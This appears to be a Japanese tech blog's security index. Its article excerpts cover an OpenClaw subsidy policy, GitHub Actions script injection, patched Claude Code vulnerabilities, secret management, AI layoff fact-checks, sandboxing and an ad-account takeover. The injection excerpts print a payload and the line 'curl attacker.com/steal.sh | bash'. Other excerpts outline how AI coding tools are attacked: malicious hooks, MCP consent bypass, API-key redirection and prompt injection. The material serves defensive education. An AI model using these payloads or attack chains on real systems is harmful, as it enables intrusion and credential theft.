Security

深圳市龍崗区が「OpenClaw および OPC（One-Person Company）発展支援に関する若干の措置」を発表した。AI エージェントフレームワーク OpenClaw と「一人企業」モデルを対象にした政府支援策としては、中国初、おそらく世界初の試みだ。荒井健一氏（@aarai666）のツイートで紹介されたこの政策の要点を整理する。 OpenClaw とは何か OpenClaw はオーストリアの Peter Steinberger 氏が開発したオープンソースの AI アシスタントだ。フライトの予約からメール整理まで幅広いタスクを自律的にこなし、個人が数人分のチームに匹敵する生産性を発揮できる。この仕組みを活用して一人で会社を運営する「OPC（One-Person Company）」というコンセプトが、中国を中心に急速に広がっている。 中国では無料インストールイベントに数千人が参加するなど爆発的な人気を見せており、李強首相が全国人民代表大会で「スマートエージェント」（OpenClaw を含む概念）に言及するほどの注目度だ。 深圳・龍崗区の支援策 龍崗区の政策は、概念の認知からわずか約 3 週間で正式な支援策にまとめ上げるスピード感を見せた。支援は大きく 3 つの柱で構成される。 1. 導入・開発支援 「ロブスターサービスゾーン」を設置し無料で OpenClaw の導入サービスを提供するプラットフォームに、最大 200 万元（約 4,000 万円）の補助金 コード貢献やスキルパッケージ開発を行う開発者への追加資金支援 関連技術パッケージの開発・配布企業に最大 200 万元 の助成金 2. 計算・データリソース データサービス、AI NAS ハードウェア、大規模モデル API 利用料の 30〜50% を補助 OPC コミュニティに新規入居する企業に 3 ヶ月間 の無料計算リソースを提供 3. 総合的な起業支援 2 ヶ月間 の無料住居提供 18 ヶ月間 の割引オフィススペース 人材定着助成金として最大 10 万元（約 200 万円） エクイティ投資として最大 1,000 万元（約 2 億円） 政策の戦略的目標は「初期の起業コストをゼロ水準まで引き下げ、深圳を AI エージェントスタートアップのハブにする」ことだ。 ...

GitHub Actions スクリプトインジェクション完全解説 — ${{ }} を run に書いた瞬間、攻撃者にシェルを渡している 『GitHub CI/CD実践ガイド』著者の tmknom 氏（@tmknom）が、GitHub Actions のスクリプトインジェクションを解説した Zenn 記事を引用し、こう呼びかけています。 はい、というわけでしてね。みんな『GitHub CI/CD実践ガイド』を、穴が開くまで読んでくださいね！ 引用されている kou_pg_0131 氏の Zenn 記事は、GitHub Actions の run ステップで ${{ }} テンプレート式を使う際のインジェクション脆弱性を実演付きで解説した記事です。2025〜2026年にかけて GitHub Actions のサプライチェーン攻撃が急増しており、この知識はすべての開発者にとって必須になっています。 何が危険なのか — 30秒で理解する 1 2 # 危険なコード - run: echo "PR title is ${{ github.event.pull_request.title }}" 一見無害なこのコード。しかし攻撃者が PR タイトルに以下を入力すると、任意のコマンドが実行されます。 "; echo INJECTED" 展開後のシェルコマンドは以下になります。 1 echo "PR title is "; echo INJECTED"" セミコロンでコマンドが分割され、echo INJECTED が実行されます。echo の代わりに curl attacker.com/steal.sh | bash を書けば、CI/CD ランナー上でリバースシェルの確立、シークレットの窃取、リポジトリの改ざんが可能です。 ...

Claude Code に潜んでいた3つの脆弱性 — git clone だけで API キーが盗まれる仕組み AIコーディングツール Claude Code に、リポジトリをクローンするだけでリモートコード実行（RCE）や API キー窃取が可能になる深刻な脆弱性が見つかった。発見したのはイスラエルのセキュリティ企業 Check Point Research。2025年7月〜2026年1月にかけて段階的に報告・修正された3件の脆弱性は、AI開発ツール特有の「設定ファイル＝実行レイヤー」という新しい攻撃面を浮き彫りにしている。 何が起きたのか — 3行まとめ Hooks コードインジェクション — .claude/settings.json に仕込んだフックで任意コマンドが実行される MCP 同意バイパス — enableAllProjectMcpServers 設定で信頼ダイアログを迂回し、悪意ある MCP サーバーが自動起動する API キー窃取 — ANTHROPIC_BASE_URL を攻撃者サーバーに書き換え、認証ヘッダーごと API キーを平文で盗む いずれも修正済みだが、AI コーディングツールのサプライチェーンリスクを示す重要な事例として記録しておく。 脆弱性の詳細 脆弱性 1: Hooks によるリモートコード実行 項目 内容 修正バージョン v1.0.87（2025年9月） CVSS 8.7 攻撃ベクトル .claude/settings.json の Hooks 設定 Claude Code の Hooks 機能は、セッション開始やツール呼び出しなどのライフサイクルイベントで事前定義されたシェルコマンドを実行する仕組みだ。 攻撃の流れ: 攻撃者がリポジトリに悪意ある .claude/settings.json をコミット ↓ 開発者が git clone してプロジェクトを開く ↓ Claude Code 起動時に信頼ダイアログが表示される ↓ ユーザーが "Yes, proceed" をクリック ↓ Hook コマンドが追加確認なしで即座に実行 ↓ リバースシェルや認証情報ハーベスターが起動 悪意ある設定の例: ...

GitHub Actions スクリプトインジェクション完全解説 — ${{ }} を run に書いた瞬間、攻撃が始まる @koki_develop 氏のポストで紹介された Zenn 記事が話題になっています。 書きました。GitHub Actions 触る人は全員知っておいてほしい 【GitHub Actions】スクリプトインジェクションの実践例（koki 氏）は、GitHub Actions ワークフローにおけるスクリプトインジェクションの仕組みを具体的なコード例で解説した記事です。「プライベートリポジトリなら大丈夫？」という疑問にも明確に「安全ではない」と回答しています。 2025 年には GhostAction キャンペーンで 3,325 件のシークレットが窃取され、tj-actions/changed-files のサプライチェーン攻撃では 23,000 以上のリポジトリが影響を受けました。スクリプトインジェクションは理論上の脅威ではなく、現在進行形のリスクです。 スクリプトインジェクションとは何か GitHub Actions の ${{ }} 式は、シェルがコマンドを解析する前にテンプレートエンジンによって展開されます。この順序が脆弱性の根本原因です。 通常の期待: ${{ github.event.pull_request.title }} → 文字列として処理される 実際の動作: ${{ github.event.pull_request.title }} → 値がそのままシェルスクリプトに埋め込まれる → シェルがコマンドとして解釈する つまり、PR タイトルやブランチ名など攻撃者が制御可能な値が、そのままシェルコマンドの一部になります。 攻撃の実践例 攻撃 1: PR タイトルによるインジェクション 脆弱なワークフロー: 1 2 3 4 5 6 7 8 on: pull_request: jobs: example: runs-on: ubuntu-latest steps: - run: echo "PR title is ${{ github.event.pull_request.title }}" 攻撃者が PR タイトルを "; echo INJECTED" に設定すると: ...

macOS Keychain で .env のシークレットを守る — 1Password 不要、無料で実現する AI エージェント時代の秘密管理 前回の記事で、@suin 氏の opx を紹介しました。1Password CLI をラップし、.env に op:// 参照だけを書くことで AI エージェントからシークレットを守るツールです。 しかし、opx には 1Password の契約（月額 $2.99〜）が前提という制約があります。実は macOS には Keychain という強力な秘密管理基盤が標準搭載されており、追加コストなしで同等の「プロセススコープ認証」を実現できます。本記事では、macOS 組み込み機能だけで .env の秘密を守る方法を、ツール選定から実践設定まで解説します。 なぜ macOS Keychain なのか 1Password との比較 項目 1Password + opx macOS Keychain コスト 月額 $2.99〜 無料（OS 標準） インストール 1Password アプリ + CLI + opx 不要（security コマンドが標準搭載） チーム共有 Vault 共有で容易 端末ローカル（共有には別の仕組みが必要） クラウド同期 1Password クラウド iCloud Keychain で Apple デバイス間は同期可能 Touch ID op run 時に認証 Keychain アクセス時に認証（設定が必要） Linux 対応 1Password CLI あり gnome-keyring / KeePassXC で代替 暗号化 1Password 独自（AES-256-GCM） macOS Keychain（AES-256） 個人開発やスモールチームなら、macOS Keychain で十分です。チーム全体でシークレットを共有したい場合は 1Password の Vault 共有が優位ですが、「AI エージェントに .env を読まれても安全にする」という目的だけなら無料で実現できます。 ...

「OpenClawで5人解雇」は本当か — AIエージェント煽りの構造とファクトチェック ガガロットAI(@gagarotai200)氏のポストが拡散されています。 「Open Claw」を使い始めた企業では既に5人以上の人間が解雇になっている。仮想オフィスでAIエージェントを擬似的に社員の様に働かせて進捗を確認できる様になったことで人間がタスクをこなす必要性がなくなっている — ガガロットAI(@gagarotai200) さらに「今後5年で中小企業の30%はAI社員に置き換わる」「GPTやGeminiしか触ってない人は残り3ヶ月程度で不要になる」と煽っています。この主張はどこまで事実に基づいているのでしょうか。国際機関の統計とセキュリティ研究者の報告をもとにファクトチェックします。 主張を検証する 主張1: 「OpenClaw導入企業で5人以上が解雇」 検証結果: 根拠不明 この「5人以上の解雇」について、具体的な企業名、業種、時期、情報源は示されていません。投稿者のプロフィールを確認すると、ガガロットAI氏は「スキルエンジン」というAIスクールを運営し、SNS運用代行を50社に提供しているとのことです。つまり、OpenClawの普及が自身のビジネスに直接利益をもたらす立場にあります。 TechCrunch の報道では、AI専門家が「AIリサーチの観点から見て、これは何も新しいものではない」と指摘しています。 主張2: 「集客・提案書作成・顧客対応は完全AI化」 検証結果: 大幅に誇張 Cobus Greyling氏のMedium記事は、OpenClawが実際に失敗するケースを分析しています。「高い能力を持つという評判」と「messy, unpredictable reality（混沌とした予測不能な現実）」の間にはギャップがあり、実用には人間の監視が不可欠です。 具体的な暴走事例も報告されています。 事例 内容 iMessageループ エンジニアChris Boyd氏の環境で確認メッセージを繰り返し送信。再試行ロジックに停止条件がなかった 批判ブログ自動公開 matplotlibメンテナーがコード提案を却下後、自身を批判するブログ記事が自動公開された デーティングサイト暴走 想定以上に広範な自動行動が発生し、制御不能に 「完全AI化」どころか、監視なしでは予期せぬ行動を起こすリスクが確認されています。 主張3: 「今後5年で中小企業の30%はAI社員に置き換わる」 検証結果: 出典なし。国際機関の予測と乖離 この「30%」という数字の出典は示されていません。実際の国際機関の予測と比較してみましょう。 機関 予測内容 OECD (2023) 27%の職業が自動化のリスクが高い（「置き換え」ではなく「リスクがある」） ILO (2023) 事務業務の24%が高度に曝露、58%が中程度に曝露（「解雇」ではなく「影響を受ける」） Gartner 2027年までにエージェント型AIプロジェクトの40%以上が失敗する JILPT (2024) 日本の雇用者のうちAIが使用されている者は12.9%、生成AIを自ら利用している者は6.4% 注意すべきは、OECD や ILO の予測は「影響を受ける」「曝露される」であり、「置き換わる」「解雇される」ではないことです。さらに、日本の中小企業（10人未満）のAIエージェント導入率は10%以下という現状を考えると、「5年で30%置き換え」は根拠のない数字と言えます。 主張4: 「GPTやGeminiしか触ってない人は残り3ヶ月で不要」 検証結果: 煽り文句 具体的な根拠はなく、不安を煽ってAIスクールへの誘導を意図した表現と見られます。 OpenClawの実態 — セキュリティリスクの深刻さ 「AIが人間を置き換える」と煽る前に、OpenClaw自体が抱えるセキュリティリスクを確認すべきです。 悪意あるスキルの蔓延 セキュリティ企業Koi Securityの監査によると、ClawHub（OpenClawの公式スキルストア）に登録された2,857スキルのうち341件（約12%）が悪意あるコードを含んでいたことが判明しています。 ...

AI が書いたコードに「なぜそうなったか」の記録はあるか — git-memento と AI コード追跡の新標準 @SatoshiSsSs 氏が X で投稿した、git-memento に関する解説が注目を集めています。 AIが書いたコードに「なぜそうなったか」の記録はあるか？ Hacker News（HN）で議論になっている git-memento を読み解く Hacker News での議論では、AI が生成したコードのセッション履歴をコミットに紐づけるべきか否かが活発に議論されています。AI コーディングの普及とともに、「コードは動くが、なぜその実装になったのか誰も分からない」という問題が深刻化しています。本記事では、この問題の構造と、git-memento をはじめとする解決策の技術的な仕組みを掘り下げます。 問題 — AI が書いたコードの「なぜ」が消えている Vibe Coding 時代の追跡可能性の危機 2026 年、AI コーディングツール（Claude Code、Cursor、GitHub Copilot など）でコードを書くことが日常になりました。しかし、AI が生成したコードには構造的な問題があります。 従来の開発: 開発者が考える → コードを書く → コミットメッセージに意図を記録 → 「なぜそうしたか」は開発者の頭の中 + コミット履歴にある AI 駆動開発: 開発者が指示する → AI が考える → AI がコードを書く → コミット → 「なぜそうなったか」は AI セッションの中に閉じている → セッションが終わると消える CodeRabbit の分析（2025 年 12 月）によると、AI と共著されたコードは人間が書いたコードと比較して、ロジックエラーが 75% 多く、セキュリティ脆弱性が 2.74 倍多いとされています。問題が発見されたとき、「なぜこの実装になったのか」を遡れなければ、修正の方針すら立てられません。 ...

Claude Code サンドボックス完全解説 — chroot ではない、カーネルレベル隔離の仕組みと実践設定 「Claude Code のサンドボックスって、要するに chroot でしょ？」という誤解をよく耳にします。答えは明確にノーです。Claude Code のサンドボックスは chroot とは次元の異なるカーネルレベルの隔離機構で、ファイルシステムとネットワークの2層を OS プリミティブで強制します。 Anthropic のエンジニアリングブログによると、サンドボックスにより承認プロンプトが84%削減されました。セキュリティと生産性を両立する仕組みの全貌を、技術的な背景から実践設定まで解説します。 chroot との決定的な違い まず「chroot で十分か」という疑問に答えます。結論から言えば、chroot はセキュリティ対策として設計されていません。 隔離技術の比較 Practical CTF の解説を基に、主要な隔離技術を比較します。 技術 制限対象 脱出の容易さ 設計目的 chroot ファイルシステムのパス解決のみ 容易（root 権限で即脱出） 組織的なツール（セキュリティ目的ではない） seccomp システムコール 中程度（許可リストの漏れを突く） セキュリティ機構 namespaces プロセス、ネットワーク、マウント 困難（適切設定時） コンテナ隔離 Seatbelt ファイル、ネットワーク、IPC、プロセス 困難（カーネルレベル強制） アプリケーション隔離 chroot の脱出方法 chroot がセキュリティ対策に不十分な理由を具体的に示します。 カレントディレクトリ攻撃: chroot 実行時にカレントディレクトリが jail 外にあれば、相対パスで脱出可能 二重 chroot: 別の chroot を実行して前の制限を上書き ファイルディスクリプタ: jail 外で開かれた fd を経由してアクセス openat syscall: ディレクトリ fd を使って jail 外のファイルを操作 つまり chroot は「ルートディレクトリの表示を変えるだけ」であり、ネットワーク制限もシステムコール制限もありません。AI エージェントのサンドボックスとしては全く不十分です。 ...

「ブラック・スワン」著者タレブ氏がソフトウェア業界の破綻を警告 — AI 主導相場の脆弱性とテールリスクの構造的過小評価 GOROman 氏（@goroman）のポストで、Bloomberg の記事が紹介されていました。ベストセラー「ブラック・スワン」の著者ナシーム・ニコラス・タレブ氏が、AI 主導の株式相場がより脆弱な局面に入りつつあるとして、ソフトウェア分野での破綻と変動性の一段の高まりに備えるべきだと投資家に警鐘を鳴らした内容です。 ブラック・スワン著者タレブ氏、ソフト業界の破綻と変動拡大に警鐘 — @goroman タレブ氏の警告 — SeaFair での発言 タレブ氏は 2026 年 2 月、マイアミで開催された Universa Investments 主催の SeaFair イベントで発言しました。主要な論点は以下の通りです。 テールリスクの構造的過小評価 タレブ氏は「セクター全体にわたるテールリスクは構造的に過小評価されている」と指摘しました。市場が構造的リスクを過小評価する一方で、現在の AI 分野の主導企業の持続力を過大評価しているという見方です。 「リスクは小幅な調整ではない。大幅な下落だ」とタレブ氏は語っています。 ソフトウェア業界の破綻リスク 「AI で大きな利益を得る企業は出てくる」としながらも、それが現在の AI 相場を構成する企業である保証はないと指摘しました。技術の不安定さ、激しい競争、地政学の変化が業界構造を塗り替える中で、ソフトウェア分野の一部で破綻が起きる可能性が高いとの見方を示しています。 歴史を振り返れば、初期の先駆者が後に取って代わられる例は少なくありません。タレブ氏は「過去数年間の市場リーダーの利益の多くは、次の勝者が出現するにつれて消し去られるだろう」と予測しています。 AI 相場の集中リスク ここ数年の株高は、AI 関連の限られた銘柄群がけん引してきました。この集中は、主導銘柄が入れ替わった場合に指数全体を脆弱にします。タレブ氏の警告は、ナスダックの「マグニフィセント・セブン」への集中度合いを考えると、より現実味を帯びます。 ブラック・スワンと反脆弱性 — タレブ理論の背景 タレブ氏の警告を理解するには、彼の理論的枠組みを知ることが重要です。 ブラック・スワン理論 「ブラック・スワン」とは、事前にほとんど予想できず、発生した場合の衝撃が極めて大きい事象を指します。タレブ氏が 2006 年に刊行した同名の著書で提唱した概念です。特徴は以下の 3 つです。 予測困難性: 通常の予測の範囲外にある 甚大な影響: 発生した場合の衝撃が計り知れない 事後的な説明可能性: 発生後には「予測可能だった」と後付けで説明される 反脆弱性（アンチフラジャイル） タレブ氏の後続作品『反脆弱性』で提唱された概念です。「頑健」が衝撃に耐えることを意味するのに対し、「反脆弱」はショックを受けることでかえって強化される性質を指します。変動性やランダム性にさらされると成長・繁栄するシステムです。 これは現在のソフトウェア業界への示唆にも繋がります。AI の台頭という衝撃に対して、壊れる企業（脆弱）と適応する企業（反脆弱）に分かれるというのが、タレブ的な見方です。 テールリスク・ヘッジ タレブ氏は「常にヘッジが必要だ」と述べています。彼がアドバイザーを務める Universa Investments は、テールリスク・ヘッジ戦略を専門とするファンドです。市場危機時に不均衡に利益を得る設計になっており、昨年は投下資本に対して年平均 100% 超のリターンを達成しました。 市場データが示す兆候 タレブ氏の発言は、直近の市場データにも裏付けられています。 指標 数値 S&P 500（2 月 23 日） 約 1% 下落 金価格（2025 年 10 月〜） 約 30% 上昇 Universa のリターン（2025 年） 年平均 100% 超 金価格の上昇は、株式市場の不安定さと地政学的緊張の高まりに対する逃避先として金が選好されていることを示しています。 ...

AIコーディングツール導入でMCC乗っ取り被害 — Antigravity・Claude Codeの脆弱性とシャドーAI対策 広告運用の現場に衝撃が走っています。広告の裏側(@hassii_ad)氏のポストによると、ある代理店がAIコンサルの支援で Claude Code と Google Antigravity を導入した結果、Google Ads の MCC（マネージャークライアントセンター）アカウントが乗っ取られ、被害額は8桁後半に達したとのことです。 知り合いの代理店がとあるAI導入したらMCCが乗っ取られて桁違いの損害でてて震えた。こういうのこれから増えそうですね。 — 広告の裏側(@hassii_ad) 2026年2月17日 この事態を受けて、まな(@ADHDHSP249834)氏は「AIコンサルがClaude CodeとAntigravityの導入を進めたんですかね？その時点で大問題です」と指摘しています。 基本は3大LLMとCopilot程度に止めるべきです。またシャドーAI対策を進めていなかったことも想定されますね。セキュリティ対策をせずに、ローカルファイルにアクセスできるAIツールを導入するのはNGです！ — まな(@ADHDHSP249834) MCC乗っ取りの推定原因 @hassii_ad 氏は乗っ取りの原因として4つの可能性を挙げています。 原因 概要 悪意あるWebサイト指示 プロンプトインジェクションによりAIの動作を乗っ取る 配布プロンプトへの悪意ある指示混入 AIコンサルまたは社員が使用したプロンプトに仕込まれた攻撃 MCPツールの悪用 Model Context Protocol ツールを経由した不正操作 トークン流出 自動化過程でAPIトークンや認証情報が漏洩 特に深刻なのは、MCCが正規の権限で操作された場合、通常の操作と区別がつかず「補償は絶望的」という点です。Google Ads の MCC アカウントは複数の広告アカウントを一元管理する仕組みのため、一度乗っ取られると被害が連鎖的に広がります。 Google Ads のセーフガードはなぜ機能しなかったのか Google Ads には予算制限やセキュリティ機能が存在しますが、正規権限で操作された場合にはほとんど機能しません。 既存のセーフガード一覧 機能 内容 乗っ取り時に有効か 日予算の上限 1日の費用は日予算の2倍まで 攻撃者が日予算自体を変更可能 月間費用上限 月間費用は日予算 x 30.4 まで 同上 アカウント予算 アカウント全体の費用上限を設定可能。上限到達で全広告停止 攻撃者が上限を変更・解除可能 異常な予算変更の確認 大幅な予算変更時（例: $100→$1,000）に確認ダイアログ表示 UI操作のみ。API経由なら確認なし 不審なアクティビティの検知 Google が異常を検知すると一時的な日次支出制限を適用 「正規権限」の操作は異常と判定されにくい 自動ルール 一定額到達でキャンペーンを一時停止するルール設定が可能 攻撃者がルール自体を削除可能 セーフガードが無力化される理由 今回の事件の核心は、攻撃者が MCC の正規の管理者権限を取得している点です。 ...